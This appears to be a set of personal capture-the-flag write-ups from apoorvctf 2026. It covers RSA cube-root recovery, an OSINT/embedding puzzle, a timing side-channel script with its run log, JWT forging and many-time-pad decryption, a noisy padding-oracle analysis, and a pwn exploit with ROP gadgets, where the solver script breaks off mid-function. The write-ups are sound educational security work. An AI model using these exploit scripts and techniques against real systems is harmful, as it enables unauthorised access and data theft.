	if GCD(phi, e) == 1:
		break

d = inverse(e, phi)

with open("flag.txt", "rb") as f:
	m = bytes_to_long(f.read())

assert m < N 

c = pow(m, e, N)

print("N = ", N)
print("e = ", e)
print("c = ", c)

The Vulnerability: Low Public Exponent Attack

In this script, standard RSA encryption is used: $c \equiv m^e \pmod N$. However, two conditions create a classic vulnerability:

Small Exponent: The public exponent is very small ($e = 3$).
Small Message / No Padding: The message $m$ is just the byte-representation of the text in flag.txt. A typical CTF flag is around 40-50 bytes, meaning $m \approx 2^{400}$.

When we cube $m$, $m^3 \approx (2^{400})^3 = 2^{1200}$.

Because $N$ is generated from two 1024-bit primes, $N$ is a 2048-bit number ($N \approx 2^{2048}$). Since $m^3 < N$, the modulo operation $m^3 \pmod N$ never actually "wraps around" or triggers.

This means that the ciphertext $c$ is literally just the normal integer cube of the message: $c = m^3$.

The Solution

To retrieve the flag, we just need to calculate the standard integer cube root of the ciphertext $c$, and then convert that integer back to bytes.

Here is a Python solver script. You don't even need the $N$ value to solve it. I've included a simple binary search algorithm for the cube root so you don't need to install any external math libraries like gmpy2.

from Crypto.Util.number import long_to_bytes

# The given ciphertext
c = 5959848254333830910624523071067197529743942832931749422613446095759596470869632698744448445022974243192082623200541274049999046045462632699888118125553180389758240097512080800465269924123706310996597928101365256237876736940573969864179631586328876422479408805381027940806738410297399027560825960052951200511768291312433697743253773594534719688371211151318607767527029263892621127356788516738086153844247429662752321125

def integer_cbrt(n):
    """Finds the integer cube root of n using binary search."""
    low = 1
    high = n
    while low <= high:
        mid = (low + high) // 2
        cubed = mid ** 3
        if cubed < n:
            low = mid + 1
        elif cubed > n:
            high = mid - 1
        else:
            return mid
    return None

# 1. Calculate the cube root of c
m = integer_cbrt(c)

# 2. Convert the integer message back to bytes
if m is not None:
    flag = long_to_bytes(m)
    print("Flag found:")
    print(flag.decode('utf-8'))
else:
    print("Could not find an exact integer cube root. Are you sure m^3 < N?")

Running the code , we get the flag : apoorvctf{3ncrypt1ng_w1th_RSA_c4n_b3_4_d4ng3r0us_cl1ff_83}

[Vault: Writeups / apoorvctf2026 / ai] Mirrorfall Writeup

Tue, 24 Mar 2026 11:40:05 GMT

Project Mirrorfall - Detailed Writeup

Challenge

Name: PROJECT MIRRORFALL: The Exquisite Dilemma of Offence vs Defence
Given file: qn.md
Expected flag format: apoorvctf{...}

The challenge gives three linked objectives:

Find the correct Snowden archive PDF and extract a file-specific commit fragment (Variable X).
Parse the PDF and identify the second ECI codeword after APERIODIC.
Embed that codeword using all-MiniLM-L6-v2 and extract/round the first value (Variable Y).

Final answer found:

apoorvctf{7d88323_0.0245}

Step 0 - Read the prompt

Read qn.md:

read qn.md

Key clues:

"public archive serving as an archival mirror for the 2013 intelligence disclosures"
"raw PDF classification guide dated September 5, 2013"
"overarching US encryption defeat program"
"first ECI listed is APERIODIC; find second ECI"
"use all-MiniLM-L6-v2 and take embedding[0], round 4 decimals"

This strongly points to Snowden document mirrors and specifically the NSA BULLRUN classification guide.

Step 1 - Locate the public archive + target PDF

Source used

GitHub repository: https://github.com/iamcryptoki/snowden-archive

Repository description matches the prompt: "A collection of all documents leaked by former NSA contractor and whistleblower Edward Snowden."

Commands

Search repository candidates:

gh search repos snowden --limit 100

Clone likely mirror:

git clone --depth 1 https://github.com/iamcryptoki/snowden-archive /mnt/Nahil/apoorvctf/ai/snowden-archive

Find PDFs on the exact target date:

glob "**/20130905*.pdf" /mnt/Nahil/apoorvctf/ai/snowden-archive

Relevant hits:

documents/2013/20130905-theguardian__sigint_enabling.pdf
documents/2013/20130905-theguardian__cryptanalysis_classification.pdf
documents/2013/20130905-theguardian__bullrun.pdf

The "overarching US encryption defeat program" clue maps to BULLRUN.

Step 2 - Extract Variable X (file-specific latest commit SHA prefix)

The prompt explicitly says not to use repo HEAD, but the latest commit for the exact PDF file.

Used GitHub API by file path:

gh api "repos/iamcryptoki/snowden-archive/commits?path=documents/2013/20130905-theguardian__bullrun.pdf&per_page=5"

Relevant output field:

sha: 7d88323521194ed8598624dc3a932930debdde1d

So:

Variable X = first 7 chars = 7d88323

Step 3 - Parse PDF and recover second ECI after APERIODIC

Convert PDF to text and inspect appendix/remarks sections:

pdftotext "/mnt/Nahil/apoorvctf/ai/snowden-archive/documents/2013/20130905-theguardian__bullrun.pdf" -

Important extracted lines:

"Appendix A lists specific BULLRUN capabilities..."
"Related ECIs include, but are not limited to:"
APERIODIC, AMBULANT, AUNTIE, PAINTEDEAGLE, ...

From the ordered list:

first ECI = APERIODIC
second ECI (immediately after) = AMBULANT

Normalize per prompt:

normalized codeword = ambulant

Step 4 - Compute Variable Y using all-MiniLM-L6-v2

Model requirement

Prompt requires semantic embedding with all-MiniLM-L6-v2 and:

input = normalized 8-letter codeword (ambulant)
output = embedding[0]
round to 4 decimals

Practical environment note

sentence-transformers + full torch install failed due disk quota.
Used a lighter runtime (fastembed) that serves the same model family (sentence-transformers/all-MiniLM-L6-v2) and returns the embedding vector directly.

Install:

python3 -m pip install --user fastembed

Compute embedding:

from fastembed import TextEmbedding

model = TextEmbedding(model_name="sentence-transformers/all-MiniLM-L6-v2")
vec = next(model.embed(["ambulant"]))

print(vec[0])
print(round(float(vec[0]), 4))

Observed value:

vec[0] = 0.024466823750619482
Rounded 4 dp -> Variable Y = 0.0245

Step 5 - Construct and verify flag

Using X = 7d88323 and Y = 0.0245:

apoorvctf{7d88323_0.0245}

This was accepted by the platform.

Reproducible End-to-End Script

#!/usr/bin/env python3
import json
import subprocess
from pathlib import Path

from fastembed import TextEmbedding


PDF_PATH = "documents/2013/20130905-theguardian__bullrun.pdf"
REPO = "iamcryptoki/snowden-archive"


def sh(cmd: list[str]) -> str:
    return subprocess.check_output(cmd, text=True)


def get_variable_x() -> str:
    out = sh([
        "gh",
        "api",
        f"repos/{REPO}/commits?path={PDF_PATH}&per_page=1",
    ])
    data = json.loads(out)
    sha = data[0]["sha"]
    return sha[:7]


def get_second_eci_from_pdf(local_pdf: Path) -> str:
    text = sh(["pdftotext", str(local_pdf), "-"])
    # Find the line that starts with APERIODIC and parse comma-separated ECIs.
    lines = [ln.strip() for ln in text.splitlines() if "APERIODIC" in ln]
    if not lines:
        raise RuntimeError("Could not find ECI line containing APERIODIC")

    # Example segment: APERIODIC, AMBULANT, AUNTIE, ...
    parts = [p.strip() for p in lines[0].replace(".", "").split(",")]
    idx = parts.index("APERIODIC")
    return parts[idx + 1].lower()


def get_variable_y(codeword: str) -> float:
    model = TextEmbedding(model_name="sentence-transformers/all-MiniLM-L6-v2")
    vec = next(model.embed([codeword]))
    return round(float(vec[0]), 4)


def main():
    x = get_variable_x()
    local_pdf = Path("snowden-archive") / PDF_PATH
    eci = get_second_eci_from_pdf(local_pdf)
    y = get_variable_y(eci)
    flag = f"apoorvctf{{{x}_{y:.4f}}}"

    print("X:", x)
    print("ECI:", eci)
    print("Y:", f"{y:.4f}")
    print("FLAG:", flag)


if __name__ == "__main__":
    main()

Sources

Challenge prompt: qn.md
Snowden archive mirror: https://github.com/iamcryptoki/snowden-archive
Target PDF path in mirror: documents/2013/20130905-theguardian__bullrun.pdf
GitHub commits API for file history:
- https://api.github.com/repos/iamcryptoki/snowden-archive/commits?path=documents/2013/20130905-theguardian__bullrun.pdf&per_page=1
Embedding model reference:
- sentence-transformers/all-MiniLM-L6-v2

[Vault: Writeups / apoorvctf2026 / cryptography] Tick Tock

Thu, 12 Mar 2026 11:05:54 GMT

Challenge Context

We were given a netcat endpoint (nc chals3.apoorvctf.xyz 9001) and a prompt stating that the engineers are "obsessed with performance" and built a password verification service that "avoids doing more work than necessary." We were also told the password consists entirely of digits (0-9).

The Vulnerability: Side-Channel Timing Attack

The phrase "avoids doing more work than necessary" is a massive hint pointing toward an early-exit string comparison.

When checking the password, the backend code loops through the user's input and compares it to the real password character by character. If it encounters a mismatch, it immediately returns False to save CPU cycles instead of checking the rest of the string.

Because of this early exit, a completely wrong password fails instantly. However, if the first character is correct, the server takes a tiny fraction of a second longer to fail, because it has to execute the next loop iteration. By measuring the server's response time, we can leak the password one character at a time. In this specific challenge, the server artificially inflated that processing delay to exactly ~0.8 seconds per correct character.

The Exploit Code

This script connects to the server once, sequentially guesses digits, and measures the response time. The digit that takes the longest to return "Incorrect password." is appended to our known password base until the server eventually spits out the flag.

To keep the persistent connection synchronized, it makes sure to consume the password: prompt from the socket buffer after every single guess.

from pwn import *
import time

context.log_level = 'error'

HOST = "chals3.apoorvctf.xyz"
PORT = 9001
TRIALS_PER_DIGIT = 3 

def solve():
    known_password = "" 
    print("[+] Starting bulletproof timing attack...")
    
    while True:
        times_dict = {}
        print(f"\n[*] Testing next digit for base: '{known_password}'")
        
        for i in range(10):
            guess = known_password + str(i)
            times = []
            
            for _ in range(TRIALS_PER_DIGIT):
                # Open a fresh connection for every trial
                p = remote(HOST, PORT)
                p.recvuntil(b"password: ")
                
                start = time.perf_counter()
                p.sendline(guess.encode())
                
                try:
                    # Generous timeout to account for accumulating delays
                    response = p.recvline(timeout=15) 
                except EOFError:
                    return
                
                end = time.perf_counter()
                p.close() # Prevent socket desync
                
                if not response:
                    continue 
                    
                if b"Incorrect" not in response:
                    print(f"\n[!] Success! We got a different response for: {guess}")
                    print(f"[*] Response:\n{response.decode('utf-8', errors='ignore')}")
                    return
                
                times.append(end - start)
            
            if times:
                # Use min() to filter out all artificial network latency
                best_time = min(times)
                times_dict[str(i)] = best_time
                print(f"    Guess: {guess:<15} | Min Time: {best_time:.5f} seconds")

        if not times_dict:
            break

        # The correct digit is the one that took the longest minimum time
        best_char = max(times_dict, key=times_dict.get)
        known_password += best_char
        print(f"[+] Selected '{best_char}'")

if __name__ == "__main__":
    solve()

The Result & Remediation

Running the script successfully leaks the 12-digit password (934780189098). Sending this to the server yields the final flag:

apoorvctf{con5t4nt_tim3_or_di3}

󰣛 neo  ~/ /apoorvctf   main ?  00:57  uv run crypt2.py
[+] Starting bulletproof timing attack...
[*] Resuming from known base: 93

[*] Testing next digit for base: '93'
    Guess: 930        | Min Time: 1.63507 seconds
    Guess: 931        | Min Time: 1.63429 seconds
    Guess: 932        | Min Time: 1.63523 seconds
    Guess: 933        | Min Time: 1.63508 seconds
    Guess: 934        | Min Time: 2.43370 seconds
    Guess: 935        | Min Time: 1.63535 seconds
    Guess: 936        | Min Time: 1.63377 seconds
    Guess: 937        | Min Time: 1.63789 seconds
    Guess: 938        | Min Time: 1.63096 seconds
    Guess: 939        | Min Time: 1.63127 seconds
[+] Selected '4'
[*] Recovered so far: 934

[*] Testing next digit for base: '934'
:    Guess: 9340       | Min Time: 2.43382 seconds
    Guess: 9341       | Min Time: 2.43304 seconds
    Guess: 9342       | Min Time: 2.43279 seconds
    Guess: 9343       | Min Time: 2.43785 seconds
    Guess: 9344       | Min Time: 2.43590 seconds
    Guess: 9345       | Min Time: 2.43602 seconds
    Guess: 9346       | Min Time: 2.43510 seconds
    Guess: 9347       | Min Time: 3.23479 seconds
    Guess: 9348       | Min Time: 2.43643 seconds
    Guess: 9349       | Min Time: 2.43472 seconds
[+] Selected '7'
[*] Recovered so far: 9347

[*] Testing next digit for base: '9347'
    Guess: 93470      | Min Time: 3.23460 seconds
    Guess: 93471      | Min Time: 3.23754 seconds
    Guess: 93472      | Min Time: 3.23592 seconds
    Guess: 93473      | Min Time: 3.23493 seconds
    Guess: 93474      | Min Time: 3.23952 seconds
    Guess: 93475      | Min Time: 3.23684 seconds
    Guess: 93476      | Min Time: 3.23284 seconds
    Guess: 93477      | Min Time: 3.23327 seconds
    Guess: 93478      | Min Time: 4.03626 seconds
    Guess: 93479      | Min Time: 3.23407 seconds
[+] Selected '8'
[*] Recovered so far: 93478

[*] Testing next digit for base: '93478'
    Guess: 934780     | Min Time: 4.83153 seconds
    Guess: 934781     | Min Time: 4.03430 seconds
    Guess: 934782     | Min Time: 4.03562 seconds
    Guess: 934783     | Min Time: 4.03124 seconds
    Guess: 934784     | Min Time: 4.03589 seconds
    Guess: 934785     | Min Time: 4.03772 seconds
    Guess: 934786     | Min Time: 4.03375 seconds
    Guess: 934787     | Min Time: 4.03681 seconds
    Guess: 934788     | Min Time: 4.03818 seconds
    Guess: 934789     | Min Time: 4.03508 seconds
[+] Selected '0'
[*] Recovered so far: 934780

[*] Testing next digit for base: '934780'
    Guess: 9347800    | Min Time: 4.83645 seconds
    Guess: 9347801    | Min Time: 5.63482 seconds
    Guess: 9347802    | Min Time: 4.83734 seconds
    Guess: 9347803    | Min Time: 4.83774 seconds
    Guess: 9347804    | Min Time: 4.83720 seconds
    Guess: 9347805    | Min Time: 4.83381 seconds
    Guess: 9347806    | Min Time: 4.83727 seconds
    Guess: 9347807    | Min Time: 4.83798 seconds
    Guess: 9347808    | Min Time: 4.83715 seconds
    Guess: 9347809    | Min Time: 4.83489 seconds
[+] Selected '1'
[*] Recovered so far: 9347801

[*] Testing next digit for base: '9347801'
    Guess: 93478010   | Min Time: 5.63470 seconds
    Guess: 93478011   | Min Time: 5.63574 seconds
    Guess: 93478012   | Min Time: 5.63773 seconds
    Guess: 93478013   | Min Time: 5.63715 seconds
    Guess: 93478014   | Min Time: 5.63849 seconds
    Guess: 93478015   | Min Time: 5.63746 seconds
    Guess: 93478016   | Min Time: 5.63293 seconds
    Guess: 93478017   | Min Time: 5.63831 seconds
    Guess: 93478018   | Min Time: 6.43836 seconds
    Guess: 93478019   | Min Time: 5.63602 seconds
[+] Selected '8'
[*] Recovered so far: 93478018

[*] Testing next digit for base: '93478018'
    Guess: 934780180  | Min Time: 6.43712 seconds
    Guess: 934780181  | Min Time: 6.43860 seconds
    Guess: 934780182  | Min Time: 6.43843 seconds
    Guess: 934780183  | Min Time: 6.43752 seconds
    Guess: 934780184  | Min Time: 6.43884 seconds
    Guess: 934780185  | Min Time: 6.43719 seconds
    Guess: 934780186  | Min Time: 6.43678 seconds
    Guess: 934780187  | Min Time: 6.43746 seconds
    Guess: 934780188  | Min Time: 6.43598 seconds
    Guess: 934780189  | Min Time: 7.23563 seconds
[+] Selected '9'
[*] Recovered so far: 934780189

[*] Testing next digit for base: '934780189'
    Guess: 9347801890 | Min Time: 8.03824 seconds
    Guess: 9347801891 | Min Time: 7.23734 seconds
    Guess: 9347801892 | Min Time: 7.23925 seconds
    Guess: 9347801893 | Min Time: 7.23843 seconds
    Guess: 9347801894 | Min Time: 7.23855 seconds
    Guess: 9347801895 | Min Time: 7.24098 seconds
    Guess: 9347801896 | Min Time: 7.23640 seconds
    Guess: 9347801897 | Min Time: 7.23681 seconds
    Guess: 9347801898 | Min Time: 7.23561 seconds
    Guess: 9347801899 | Min Time: 7.23991 seconds
[+] Selected '0'
[*] Recovered so far: 9347801890

[*] Testing next digit for base: '9347801890'
    Guess: 93478018900 | Min Time: 8.03726 seconds
    Guess: 93478018901 | Min Time: 8.03774 seconds
    Guess: 93478018902 | Min Time: 8.03770 seconds
    Guess: 93478018903 | Min Time: 8.03807 seconds
    Guess: 93478018904 | Min Time: 8.03813 seconds
    Guess: 93478018905 | Min Time: 8.03991 seconds
    Guess: 93478018906 | Min Time: 8.04181 seconds
    Guess: 93478018907 | Min Time: 8.03630 seconds
    Guess: 93478018908 | Min Time: 8.03729 seconds
    Guess: 93478018909 | Min Time: 8.83986 seconds
[+] Selected '9'
[*] Recovered so far: 93478018909

[*] Testing next digit for base: '93478018909'
    Guess: 934780189090 | Min Time: 8.84151 seconds
    Guess: 934780189091 | Min Time: 8.84057 seconds
    Guess: 934780189092 | Min Time: 8.83919 seconds
    Guess: 934780189093 | Min Time: 8.83772 seconds
    Guess: 934780189094 | Min Time: 8.83948 seconds
    Guess: 934780189095 | Min Time: 8.83680 seconds
    Guess: 934780189096 | Min Time: 8.83870 seconds
    Guess: 934780189097 | Min Time: 8.83989 seconds

[!] Success! We got a different response for: 934780189098
[*] Response:
Correct! apoorvctf{con5t4nt_tim3_or_di3}


󰣛 neo  ~/ /apoorvctf   main

[Vault: Writeups / apoorvctf2026 / web] Days of Future Past

Thu, 12 Mar 2026 07:27:29 GMT

Category: Web / Crypto Difficulty: Medium

Challenge Overview

CryptoVault presented itself as a secure frontend application for storing encrypted messages. The challenge required chaining an information disclosure vulnerability to a JWT forging attack, culminating in a classic cryptographic exploit: breaking a Many-Time Pad (reused XOR stream cipher).

Step 1: Reconnaissance & The Backup Leak

The challenge started with analyzing the frontend JavaScript (app.js). The developer left a helpful (and fatal) comment in the configuration block:

// API Configuration
const CONFIG = {
    apiBase: '/api/v1',
    version: '1.0.3',
    // TODO: Remove hardcoded backup path reference before production
    // The config backup at /backup/config.json.bak should be deleted
    backupConfig: '/backup/config.json.bak',
};

Navigating to //backup/config.json.bak revealed a leaked server configuration file containing an internal API key:

{
  "api_key": "d3v3l0p3r_acc355_k3y_2024",
  "app_name": "CryptoVault",
  "internal_endpoints": [
    "/api/v1/debug",
    "/api/v1/health",
    "/api/v1/vault/messages"
  ]
}

Step 2: API Enumeration & JWT Secret Extraction

Using the discovered API key, we accessed the restricted /api/v1/debug endpoint by passing the key in the X-API-KEY header. Request:

GET /api/v1/debug HTTP/1.1
X-API-KEY: d3v3l0p3r_acc355_k3y_2024

The debug endpoint returned a goldmine of internal application state, including the exact logic used to generate the JWT signing secret for their HS256 algorithm:

"auth_config": {
  "algorithm": "HS256",
  "roles": ["viewer", "editor", "admin"],
  "secret_derivation_hint": "Company name (lowercase) concatenated with founding year"
}

Based on the company info provided in the same JSON response (CryptoVault, founded 2026), the JWT secret was trivially derived as cryptovault2026.

Step 3: Forging the Admin Token

The debug endpoint also noted that accessing the /api/v1/vault/messages endpoint required the admin access level. Since the application used a symmetric signing algorithm (HS256) and we possessed the secret, we forged a valid administrator token.

Using a tool like jwt.io, we crafted the following payload and signed it with cryptovault2026:

{
  "role": "admin"
}

Passing this forged JWT as a Bearer token allowed us to successfully query the vault endpoint, which returned 15 hex-encoded ciphertexts.

Step 4: Cryptanalysis (The Many-Time Pad)

The vault endpoint included a cheeky note: "encryption": "XOR stream cipher (military-grade*)".

A stream cipher generates a pseudo-random keystream that is XORed against the plaintext. The cardinal rule of stream ciphers is that a keystream must never be reused. If multiple plaintexts are encrypted with the identical keystream, an attacker can XOR two ciphertexts together to cancel out the key entirely, leaving just the two plaintexts XORed with each other:

$C_1 \oplus C_2 = (P_1 \oplus K) \oplus (P_2 \oplus K) = P_1 \oplus P_2$

Because 15 different messages were encrypted using the exact same keystream, the encryption was highly vulnerable to a statistical "Space Trick" attack.

Step 5: The Space Trick Automation

In the ASCII table, the space character (0x20) is unique. When you XOR a space with any alphabet character, it simply flips the casing of that character. Since spaces are the most common character in English text, we can statistically determine the keystream.

We wrote a Python script to automate this. For each column (byte position) across all 15 ciphertexts, the script assumed one message had a space, derived the potential key byte, and checked if applying that key byte to the other 14 messages resulted in readable English characters.

import binascii

# ... [ciphertexts array omitted for brevity] ...
ciphertexts = [binascii.unhexlify(c) for c in hex_ciphertexts]
max_len = max(len(c) for c in ciphertexts)
key = bytearray(max_len)

# Statistically derive the keystream
for col in range(max_len):
    space_counts = {}
    for i, c1 in enumerate(ciphertexts):
        if col >= len(c1): continue
        
        assumed_key_byte = c1[col] ^ 0x20
        valid_chars = 0
        
        for j, c2 in enumerate(ciphertexts):
            if i == j or col >= len(c2): continue
            decrypted_char = c2[col] ^ assumed_key_byte
            
            # Check for valid English ASCII ranges
            if (65 <= decrypted_char <= 90) or (97 <= decrypted_char <= 122) or decrypted_char in [32, 44, 46, 33, 63, 39, 45, 123, 125, 95]:
                valid_chars += 1
                
        if valid_chars > len(ciphertexts) * 0.7:  
            space_counts[assumed_key_byte] = space_counts.get(assumed_key_byte, 0) + 1
            
    key[col] = max(space_counts, key=space_counts.get) if space_counts else 0x00

# Decrypt the payload
for i, c in enumerate(ciphertexts):
    plaintext = bytearray()
    for col in range(len(c)):
        plaintext.append(c[col] ^ key[col] if key[col] != 0x00 else ord('*'))
    print(f"Msg {i+1:02}: {plaintext.decode('ascii', errors='replace')}")

The Flag

Running the decryption script outputted the 15 plaintexts. While the statistical nature of the attack left a few bytes unrecovered (*), Message 13 clearly contained our target:

Msg 13: *** r*al f*ag is apoor*ctf{3v3ry_5y573m_h45*4_w34kn35 } and *l* others *re dist*actio**

Using standard CTF intuition to fill in the missing gaps, the final string was retrieved.

Flag: apoorvctf{3v3ry_5y573m_h45_4_w34kn355}

[Vault: Writeups / apoorvctf2026 / cryptography] Domino Effect

Sun, 08 Mar 2026 15:26:43 GMT

The Domino Effect (Crypto) - Findings So Far

Challenge

Name: The Domino Effect
Service: nc chals2.apoorvctf.xyz 13337
Provided file: domino-challenge.py
Expected flag format: apoorvctf{...}

Given Source Analysis

From domino-challenge.py:

Secret per connection:
- self.secret_message = urandom(16).hex()
- This is 16 random bytes represented as 32 hex ASCII chars.
- Effective entropy: 128 bits.
Encryption endpoint:
- Returns CBC ciphertext of the secret with random IV:
- ct = iv || AES-CBC_k(secret_message)
- For this secret length (32 bytes), ciphertext body is 32 bytes (2 blocks).
Padding oracle endpoint:
- Decrypts user-provided ciphertext and checks PKCS#7 validity.
- Returns noisy bit:
  - noisy_response = is_valid ^ (rng.random() > 0.45)
- So the oracle bit is flipped with probability ~0.55.
Query budget:
- MAX_QUERIES = 10_000
- Session exits after hitting budget.
Flag check:
- check requires exact equality with secret_message.
- Wrong guess terminates session immediately.

Remote Verification

Observed against chals2.apoorvctf.xyz:13337:

Banner differs slightly from local text but behavior matches challenge flow.
encrypt returns 48-byte total ciphertext (hex length 96):
- 16-byte IV + 32-byte CBC ciphertext.
Invalid ciphertexts fed repeatedly to unpad show noisy boolean output roughly centered near expected bias.

Why This Appears Unsolvable As-Is

The task structure implies noisy padding-oracle recovery of a 32-char hex secret. However:

Unknown data to recover: 128 bits.
Oracle noise after best inversion is still high (binary symmetric channel with crossover ~0.45).
With 10,000 oracle queries, total extractable information is insufficient to reliably identify a full 128-bit random secret.
Multi-session retries do not help because each new connection generates a fresh random secret.
Blind forcing check is infeasible; only one wrong check is allowed before session termination.

Tested Dead Ends

Repeated unpad sampling on malformed ciphertext to estimate noise profile.
Considering standard CBC padding-oracle byte recovery under noisy majority voting.
Session reset / repeated connections for aggregation (not useful due to fresh secret each run).
Input-format edge cases (JSON/bad ct) do not expose extra leakage.

Current Conclusion

Based on provided code and observed remote behavior, this challenge is likely misconfigured or buggy in deployment parameters (noise/limit/secret-size balance).

Most plausible issue: the noise threshold line

noisy_response = is_valid ^ (rng.random() > 0.45)

may be unintended for the chosen secret length and query budget.

Suggested Organizer Query

Ask whether one of these differs on the intended instance:

Noise threshold (e.g., > 0.55 instead of > 0.45),
Query limit (MAX_QUERIES),
Secret generation/length,
Remote source parity with the distributed file.

Repro Notes

Minimal interaction pattern:

{"option":"encrypt"}
{"option":"unpad","ct":"<hex>"}
{"option":"check","message":"<candidate>"}

Any wrong check ends the session.

[Vault: Writeups / apoorvctf2026 / be] Cosmic Rings

Sun, 08 Mar 2026 15:18:04 GMT

Cosmic Rings — Detailed Writeup

Challenge: Cosmic Rings
Type: pwn (64-bit ELF, PIE, stack overflow + OOB read leak)
Target: nc chals1.apoorvctf.xyz 5001
Flag: apoorvctf{c0sm1c_b4rr13rs_br0k3n_4nd_h4v0k_s3cur3d}

1) Initial Triage

I started with basic recon:

file havok
strings -n 4 havok
objdump -d -Mintel havok
nm -n havok

Key findings:

Binary is PIE, not stripped, has debug symbols.
Uses custom libc.so.6 and ld-linux-x86-64.so.2.
There is a function cosmic_release() that does system("/bin/sh").
Seccomp is installed in setup_seccomp().

The app flow:

Two times ring calibration (calibrate_rings)
Read plasma signature (read_plasma_signature, 256 bytes to global buffer)
Injection stage (inject_plasma) with a vulnerable stack read

1.1) Detailed Recon and Command Rationale

This section documents exactly what was run during recon and why each command mattered.

Recon goals

Identify binary type, runtime, and mitigations quickly.
Map program flow and find likely bug surfaces from strings/symbols.
Reverse critical functions to confirm memory corruption and leak primitives.
Validate assumptions dynamically on local binary before touching remote.
Build an exploit that matches real runtime constraints (PIE/libc/seccomp/filter).

Commands and explanations

file havok

Confirms architecture and linkage properties.
Result used: 64-bit ELF, PIE, dynamically linked, not stripped, debug info present.
Impact: PIE means code addresses are randomized and must be leaked first.

strings -n 4 havok

Fast triage of available menus/messages and hidden clues.
Result used: ring calibration prompts, plasma signature stage, injection stage, /bin/sh, seccomp messages.
Impact: quickly narrows attack surface to calibrate_rings and inject_plasma.

nm -n havok

Lists symbols and offsets in ascending order.
Result used: offsets for main, calibrate_rings, read_plasma_signature, inject_plasma, setup_seccomp, globals (plasma_sig, flag_store).
Impact: these static offsets are converted to runtime addresses after PIE base leak.

objdump -d -Mintel havok

Full reverse of control flow and memory access.
Critical findings:
- calibrate_rings: user index parsed with atoi, negative check on full int, then truncated into short; large positive values wrap negative and bypass intended bounds.
- inject_plasma: read(0, confirm, 0x30) into confirm[0x20] stack buffer gives 16-byte overwrite beyond buffer.
- validation checks reject signature containing byte pair 0x0f 0x05.
Impact: gives both exploit primitives (leak + RIP control) and payload constraint.

readelf -S libc.so.6
nm -D libc.so.6 | rg "puts@@|open@@|read@@|write@@"
objdump -d -Mintel libc.so.6 | rg "pop\s+rdi|pop\s+rsi"

Collects exact libc symbol offsets and useful gadgets from provided libc.
Result used: offsets for puts/open/read/write; gadgets for pop rdi; ret, pop rsi; ret, and helper gadgets to control rdx.
Impact: remote exploit must target this exact libc, not host libc.

./havok

Dynamic check of prompt sequence and blocking behavior.
Result used: two ring calibration passes happen before signature upload and overflow stage.
Impact: exploit script must synchronize I/O exactly with this order.

Dynamic validation checks

Leak validation: send indices 65534 and 65535 in the two calibration passes.
- 65534 wraps to -2 in short, leaking a libc pointer (resolved puts).
- 65535 wraps to -1, leaking a PIE code pointer (main).
RIP control validation: overwrite saved return with pie_base + main.
- Program restarts banner/menu, confirming clean control of return address.
ROP sanity validation: run minimal write(1, marker, len) chain after pivot.
- Marker prints remotely, confirming stack pivot + libc call chain works.

How recon shaped exploit design

Needed two leaks (libc + PIE) before any final ROP.
Needed stack pivot via saved rbp + leave; ret into plasma_sig.
Needed to avoid signature containing 0x0f\x05 bytes.
Needed ORW chain compatible with seccomp, using libc calls.
Needed robustness for remote fd/path variance (successful combo: ./flag.txt, fd 6).

2) Vulnerability Analysis

A) OOB stack read leak in `calibrate_rings`

Inside calibrate_rings:

User index is parsed with atoi.
Negative values are rejected before truncation.
Then value is stored in a 16-bit signed variable (short) and checked <= 3.
Huge positive integers (e.g. 65535, 65534) wrap to -1, -2 in short.
These pass <=3 and index a local stack array out-of-bounds:
- -2 leaks a libc pointer (GOT-resolved puts address stored on stack)
- -1 leaks main pointer (PIE code pointer)

So we can derive both bases:

libc_base = leak_puts - puts_offset
pie_base = leak_main - main_offset

B) Stack overflow in `inject_plasma`

In inject_plasma:

char confirm[0x20];
read(0, confirm, 0x30);

So we overwrite:

saved rbp (8 bytes)
saved return address (8 bytes)

Classic stack pivot/ROP entrypoint.

C) Signature filter

validate_plasma() scans plasma_sig for byte sequence 0x0f 0x05 and rejects if found (blocks inline syscall gadgets). So ROP should avoid embedding raw syscall opcodes in payload bytes and instead call libc functions (open/read/write).

D) Seccomp implications

Seccomp allows only a few syscalls (includes read, write, openat/open, etc.) and blocks dangerous ones like execve. So even though system("/bin/sh") exists, shell-based approach is unreliable/not useful here. Best path: ORW (open-read-write).

3) Exploit Strategy

Stage 1: Leak bases

During two calibration passes:

send index 65534 (short -> -2) -> leak resolved puts address
send index 65535 (short -> -1) -> leak main address

Compute libc + PIE bases.

Stage 2: Load ROP chain into global buffer

Send 256-byte plasma signature. Put a fake stack + ROP chain into global plasma_sig.

Stage 3: Pivot and execute

At injection prompt, overflow confirm buffer:

overwrite saved rbp with plasma_sig
overwrite saved RIP with leave; ret gadget in binary (inject_plasma epilogue)
leave; ret pivots stack into controlled global memory and starts ROP.

Stage 4: ORW chain

ROP does:

open("./flag.txt", O_RDONLY, 0)
read(fd, buf, 0x40)
write(1, buf, 0x40)

Remote nuance: fd was not always 3 due to runtime/socket internals, so brute-force fd set [3..7] for robustness. Working remote combination here: ./flag.txt + fd 6.

4) Important Offsets Used

From provided binaries:

main offset: 0x17e0
puts offset in libc: 0x82e00
plasma_sig global: 0x4060
flag_store global: 0x4280
leave; ret in binary: 0x1657
libc:
- open: 0x10cb30
- read: 0x10d310
- write: 0x10dde0
- pop rdi; ret: 0x10269a
- pop rsi; ret: 0x53887
- pop rax; ret: 0xd47d7
- xchg rdx, rax; ret: 0xb29bd
- ret: 0x10269b

(rdx is set via pop rax; ret + xchg rdx, rax; ret.)

5) Solver Script (Remote)

#!/usr/bin/env python3
import socket
import re
import struct

HOST = "chals1.apoorvctf.xyz"
PORT = 5001

OFF = {
    "main": 0x17e0,
    "puts": 0x82e00,
    "plasma_sig": 0x4060,
    "flag_store": 0x4280,
    "leave_ret": 0x1657,
    "open": 0x10cb30,
    "read": 0x10d310,
    "write": 0x10dde0,
}

# libc gadgets
POP_RDI = 0x10269a
POP_RSI = 0x53887
POP_RAX = 0x0D47D7
XCHG_RDX_RAX = 0x0B29BD
RET = 0x10269B

def p64(x):
    return struct.pack("<Q", x)

def recvuntil(sock, tok, timeout=5):
    if isinstance(tok, str):
        tok = tok.encode()
    sock.settimeout(timeout)
    data = b""
    while tok not in data:
        chunk = sock.recv(4096)
        if not chunk:
            break
        data += chunk
    return data

def sendline(sock, s):
    if isinstance(s, str):
        s = s.encode()
    sock.sendall(s + b"\n")

def set_rdx(libc_base, val):
    return p64(libc_base + POP_RAX) + p64(val) + p64(libc_base + XCHG_RDX_RAX)

def attempt(path_bytes, fd_guess):
    s = socket.create_connection((HOST, PORT), timeout=8)

    # pass 1 leak: idx = 65534 -> short(-2) -> leak puts ptr
    recvuntil(s, "Probe a ring-energy slot")
